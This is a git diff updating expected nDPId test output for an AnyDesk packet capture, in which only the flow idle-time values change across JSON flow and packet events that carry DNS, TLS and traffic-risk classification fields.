00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} diff --git a/test/results/anydesk-2.pcap.out b/test/results/anydesk-2.pcap.out index 69b902e6f..8633e1efb 100644 --- a/test/results/anydesk-2.pcap.out +++ b/test/results/anydesk-2.pcap.out @@ -10,18 +10,18 @@ 00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585542,"flow_last_seen":1613977585542,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1613977585542,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-9b6827f2.net.anydesk.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1613977585553,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1613977585553,"pkt":"2MuK4S0uEBMx8Tl2CABFAABcBhBAADkRt3TAqAEBwKgBuwA12FAASAAA6omBgAABAAEAAAAADnJlbGF5LTliNjgyN2YyA25ldAdhbnlkZXNrA2NvbQAAAQABwAwAAQABAABtXAAEisckcw=="} 00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977585553,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-9b6827f2.net.anydesk.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"138.199.36.115"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977595379,"flow_last_seen":1613977595379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1613977595379,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1613977595379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595379,"pkt":"KDc3AG3I2MuK4S0uCABFAAA0dDNAAIAGAADAqAG7wKgBstOUG56PGHtIAAAAAIAC+vCE5AAAAgQFtAEDAwgBAQQC"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1613977595380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595380,"pkt":"2MuK4S0uKDc3AG3ICABFAAA0AABAAEAGtgbAqAGywKgBuxue05RZw\/OWjxh7SYAS\/\/+kVwAAAgQFtAEDAwUEAgAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1613977595380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1613977595380,"pkt":"KDc3AG3I2MuK4S0uCABFAAAodDRAAIAGAADAqAG7wKgBstOUG56PGHtJWcPzl1AQBAKE2AAA"} -01177{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595379,"flow_last_seen":1613977595380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1613977595380,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1613977595379,"flow_last_seen":1613977595391,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1705,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1613977595391,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"ee644a8a34c434abca4b737ec1d9efad","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"F8:4E:27:4E:F9:33:35:2F:1A:69:71:D5:02:6B:B8:72:EF:B7:BA:B0"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977595407,"flow_last_seen":1613977595407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1613977595407,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1613977595407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1613977595407,"pkt":"2MuK4S0uKDc3AG3ICABFAABAAABAAEAGtfrAqAGywKgBu8tHG54tLA3cAAAAALAC\/\/97PgAAAgQFtAEDAwUBAQgKHE34xQAAAAAEAgAA"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1613977595407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595407,"pkt":"KDc3AG3I2MuK4S0uCABFAAA0dDlAAIAGAADAqAG7wKgBshuey0dV\/SLKLSwN3YAS\/\/+E5AAAAgQFtAEDAwgBAQQC"} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1613977595407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1613977595407,"pkt":"2MuK4S0uKDc3AG3ICABFAAAoAABAAEAGthLAqAGywKgBu8tHG54tLA3dVf0iy1AQIABwXwAAAAAAAAAA"} -01178{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595407,"flow_last_seen":1613977595408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1613977595408,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01600{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1613977595407,"flow_last_seen":1613977595549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":813,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1613977595549,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"4b505adfb4a921c5a3a39d293b0811e1","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"86:4F:2A:9F:24:71:FD:0D:6A:35:56:AC:D8:7B:3A:19:E8:03:CA:2E"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977595379,"flow_last_seen":1613977595379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1613977595379,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1613977595379,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595379,"pkt":"KDc3AG3I2MuK4S0uCABFAAA0dDNAAIAGAADAqAG7wKgBstOUG56PGHtIAAAAAIAC+vCE5AAAAgQFtAEDAwgBAQQC"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1613977595380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595380,"pkt":"2MuK4S0uKDc3AG3ICABFAAA0AABAAEAGtgbAqAGywKgBuxue05RZw\/OWjxh7SYAS\/\/+kVwAAAgQFtAEDAwUEAgAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1613977595380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1613977595380,"pkt":"KDc3AG3I2MuK4S0uCABFAAAodDRAAIAGAADAqAG7wKgBstOUG56PGHtJWcPzl1AQBAKE2AAA"} +01177{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595379,"flow_last_seen":1613977595380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1613977595380,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1613977595379,"flow_last_seen":1613977595391,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1705,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1613977595391,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"ee644a8a34c434abca4b737ec1d9efad","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"F8:4E:27:4E:F9:33:35:2F:1A:69:71:D5:02:6B:B8:72:EF:B7:BA:B0"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977595407,"flow_last_seen":1613977595407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1613977595407,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1613977595407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1613977595407,"pkt":"2MuK4S0uKDc3AG3ICABFAABAAABAAEAGtfrAqAGywKgBu8tHG54tLA3cAAAAALAC\/\/97PgAAAgQFtAEDAwUBAQgKHE34xQAAAAAEAgAA"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1613977595407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595407,"pkt":"KDc3AG3I2MuK4S0uCABFAAA0dDlAAIAGAADAqAG7wKgBshuey0dV\/SLKLSwN3YAS\/\/+E5AAAAgQFtAEDAwgBAQQC"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1613977595407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1613977595407,"pkt":"2MuK4S0uKDc3AG3ICABFAAAoAABAAEAGthLAqAGywKgBu8tHG54tLA3dVf0iy1AQIABwXwAAAAAAAAAA"} +01178{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1613977595407,"flow_last_seen":1613977595408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1613977595408,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01600{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1613977595407,"flow_last_seen":1613977595549,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":813,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1613977595549,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"4b505adfb4a921c5a3a39d293b0811e1","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","subjectDN":"CN=AnyDesk Client, CN=AnyDesk Client","fingerprint":"86:4F:2A:9F:24:71:FD:0D:6A:35:56:AC:D8:7B:3A:19:E8:03:CA:2E"}} 00206{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":41,"source":"anydesk-2.pcap","alias":"nDPId-test","l4_data_len":3946,"global_ts_msec":1613977596944} 05655{"packet_event_id":1,"packet_event_name":"packet","packet_id":41,"source":"anydesk-2.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":3980,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":3980,"pkt_l4_len":0,"thread_ts_msec":1613977596041,"pkt":"KDc3AG3I2MuK4S0uCABFAAAAdINAAIAGAADAqAG7wKgBstOUG56PGIGVWcP92VAYA\/6ExAAAFwMDD1FZ4hNO+msUnGzaUU1nlPykrkKoqd5IWa\/vA7eRR3EZWBPkhLgUG\/LhKYhOBCw1WETNsRkQ\/Njqm5X16glM7tI+xcqXk3+pstweoYW+cn9Gn62XhRf8R73HpNP8O90ZrBr9CegI\/VdfYrSOHPhA2e99E+0j4+VZ\/OWFINBvKkj3BJnfIY06LJr7sGJtR+dAQOwICx8D4\/W7388S52uXl0lL2KX7WyKVvleG6T8fiXMQLVolTazIJs4yZw9hrrazGCRC9Iqdm+H0azjBk4m3YV2OMKP54OCS8dUcnak2O8dvImZ5iKslxqv2hokAbqvJMaM8mhVBXwGF52ctr4Cwnw77hzC+mSW4bmrp4Tcg5MPiRw1mTQ\/3NPawA+Zq2rxYSvhk\/u9pX+e10AKM2NMlc+XUfDUnwHzrihybSEsYE0XQlkwxxyc+9H9J8YsAbL+BW7EjTLB1jeSl5z2MVP12e9NNW6MZhJjwB+sOhJ+fNX0c\/v9peT6wkv\/tfGsRdmFlHVNXdzWn0O8KPkjxVcY8HmLnhgEm6RUAJURSAsF3ExMd\/sG+P\/mU688tcA+RgLosPwl9z5uDAuz9NZCd12HIAtb95ZBP9rAEaxi82tNAqOYj68rFfzNf\/RpYJfDStItU9FV3A8kHsKEGkFmk4wZ1tfIEOtfaaKe85y9pH6KiteXJy5jBBJnmRZTq3hdyxERiq+Tgi+PIu\/MNnYR6l1Pqrms9rI\/EVyNKDYzOeDBTR2B4i8xQUojiYfz8udZp2jaWACNjoGW1qrXBfIZoN6McfX9bXlxaVklg8xVW2G4CKsbb8dOBkttzzZK1dsazFK18wuUY3+V6Ukg1i3Y7Vlu6oV8qYQjVWhwNKWHFFQz6TJ1f7KJB90kDzgVnWYYn3TfOxejwLeG+nRzfrXzulo72CElL6Z\/lG\/4p+l+2wUPmPUXnPCfsAazCunsNe\/KXGVNe16AsL3LO1LT6UMDW\/nYelajX1pVTfya\/e\/g3PTYERCzcbFUt4y7zrmFbTnT4lxvHFvxanm260ljGYOP06b\/vWg+4pWLrQNkWA9MTICzlcpF\/Wmidlj0qfi29KJjQ8FUqg5l5XTfqACYhtKC63DrEESjMa46mYX5whiXYX2KSGQGVD+QvD+zhP\/CtBWeSzuMorWP+vcKHB6d86IQSfd6cz8qTUxY8QCZj3ANEPGpf51oIB2bip2d1OUvGIxbkaKup8u4V60aDmH2PiICJH7ivyV6sSvDty0QVNDKnid2wk8iOXEnChUfGO5mpd+vrzlTK6CD4G4+lV\/by4D3sFE2TznnhMG2zFDfGeHQM6Wj8gm8KTfbN+XyFgT4o3Ixk+93DyzX5mHvlurk+pBQBuQ9ppDbIH7HFD7iUZuoLbfUqyOgSKk30XQutoXEK7RJmcYeYBWd1LzTpXP+N5O5yfEDTBHxskC82ltKt9sAuTc1sKTSCwKaKWO1X\/efVdDVsf6PBKNtWizrLEymaYbySEtGfJmMlB6uqJtfUm27qL5ujDZ9mIHM3LMDyrXtK4KlpdB5iI\/euSzqF5fQqGYeXiGJN0S41Eb1GzBVvFl0s3aeJb4QFn0CJSOTsL6GyRbOkT1a0vLdMrPBz9u6BivhEd+ZLHaRV3+iJKbIcXbXR9lrCbTCrjSVY49HI76N6tDFWvse7Dr0bXXYFqqkOjweEf0JSWOknOhym3HAWiuHVX+ROnUrPCbEeLIpp8zL9GGOTk8Q2mr5Spw6l4rc37QDj2M6jtgkezE2X86cK+oDpDDOIVj+F1pGcC4UnUPTK3scoEmHGH7LkKEd5RDRudiwg7tbKcGUP4BwRqmS2Gi9LKpIBXdtqiZPGwomBbzdlo+z0RHOWr\/up4gl1dmUxQF+tDc4oHMCMi1e8zspb+grjhj6EezTHv3ji+8yN7mdzS+Gkbpt7QlBarSoY5L48wl08+ZBvrukp07VUSwQcfAn9S8NB43w8+z45JDDrveYZ28KVDUxo6GQB3B0xG4JCzoWvRhSPRa7ni7nu9Gszwc7tPJ9xiDAaAq2gfthjMseLUOdGDz0BISGCxKHZieN864AhI1py+AEI+Htmrh10CW05qpzZwVzz2VFECGzsx3x0C\/nqnxrOECzUm0dPJrMExdTxFcgoqXF011yHCSzXtxwC98icS2pusV+yTjVIhj8CfW1d+8fVhOArSXi3lMMFjUTzDLcJtssGLQ0cjVYbimvwLxyXqTRGVzWkuGVPh50FIqPQeJG1RhCeW0kbFVm7W9b9H9S7klEciP16ZhaTmVvfTTgYqrR2ZJmHH2I61Ib8cJwB7qC65zRSXnWLdZs\/TuFj\/TxT6UrRcMpV1vvOYjns3Gz\/dowyWU9MdFg1sBuoUzdYhOH+xh0gjiOiFR+OmO9yK3di5u27XLW1hOtpPgG+VqRkjUR